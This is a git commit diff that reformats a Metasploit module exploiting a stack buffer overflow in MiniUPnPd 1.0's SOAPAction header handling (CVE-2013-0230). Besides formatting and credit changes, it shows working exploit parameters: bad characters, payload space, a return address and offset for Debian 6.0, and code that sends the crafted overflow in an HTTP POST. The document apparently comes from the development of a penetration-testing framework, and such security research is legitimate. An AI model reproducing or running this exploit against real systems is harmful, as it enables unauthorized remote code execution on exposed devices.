Minor cleanup for miniupnpd_soap_bof

2013-06-04 08:53:52 -05:00 · 2013-06-04 08:53:52 -05:00 · 3111013991
parent 6497e5c7a1
commit 3111013991
1 changed files with 42 additions and 28 deletions
--- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
+++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
@ -9,41 +9,56 @@ require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient
-  Rank = NormalRanking
+	Rank = NormalRanking

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'						=>	'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
-			'Description'		 =>
-				%q{
-					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present
-					in the SOAPAction HTTP header.
-				},
-			'Author'					=> [ 'Dejan Lukan' ],
-			'License'				 => MSF_LICENSE,
-			'DefaultOptions'	=> { 'EXITFUNC' => 'process', },
+			'Name'           => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+			'Description'    => %q{
+					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
+				present in the SOAPAction HTTP header handling.
+			},
+			'Author'         =>
+				[
+					'hdm', # Vulnerability discovery
+					'Dejan Lukan' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'DefaultOptions' => { 'EXITFUNC' => 'process', },
 			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
 			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
 			# of the program is never reached)
-			'Payload'				 => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
-			'Platform'				=> 'linux',
-			'References'			=> [
-				[ 'CVE', '2013-0230' ],
-				[ 'OSVDB', '89624' ],
-			],
-			'Targets'				 =>
+			'Payload'        =>
+				{
+					'Space' => 2060,
+					'BadChars' => "\x00\x22",
+					'DisableNops' => true
+				},
+			'Platform'       => 'linux',
+			'References'     =>
 				[
-					['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+					[ 'CVE', '2013-0230' ],
+					[ 'OSVDB', '89624' ],
+					[ 'BID', '57608' ],
+					[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
 				],
-			'DefaultTarget'	 => 0,
-			'Privileged'			=> false,
-			'DisclosureDate'	 => 'Mar 27 2013',
-			))
+			'Targets'        =>
+				[
+					[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
+						{
+							'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
+							'Offset' => 2123
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 27 2013',
+		))

-			register_options(
-			[
-				Opt::RPORT(5555),
-			], self.class)
+		register_options([
+			Opt::RPORT(5555),
+		], self.class)
 	end

 	def exploit
@ -92,14 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			"</SOAP-ENV:Body>\r\n" +
 			"</SOAP-ENV:Envelope>\r\n"

-
 		#
 		# Build and send the HTTP request
 		#
 		print_status("Sending exploit to victim #{target.name} at ...")
 		send_request_cgi({
 			'method'	=> 'POST',
-			'uri'		 => target_uri.path,
+			'uri'		 => "/",
 			'headers' => {
 				'SOAPAction' => sploit,
 			},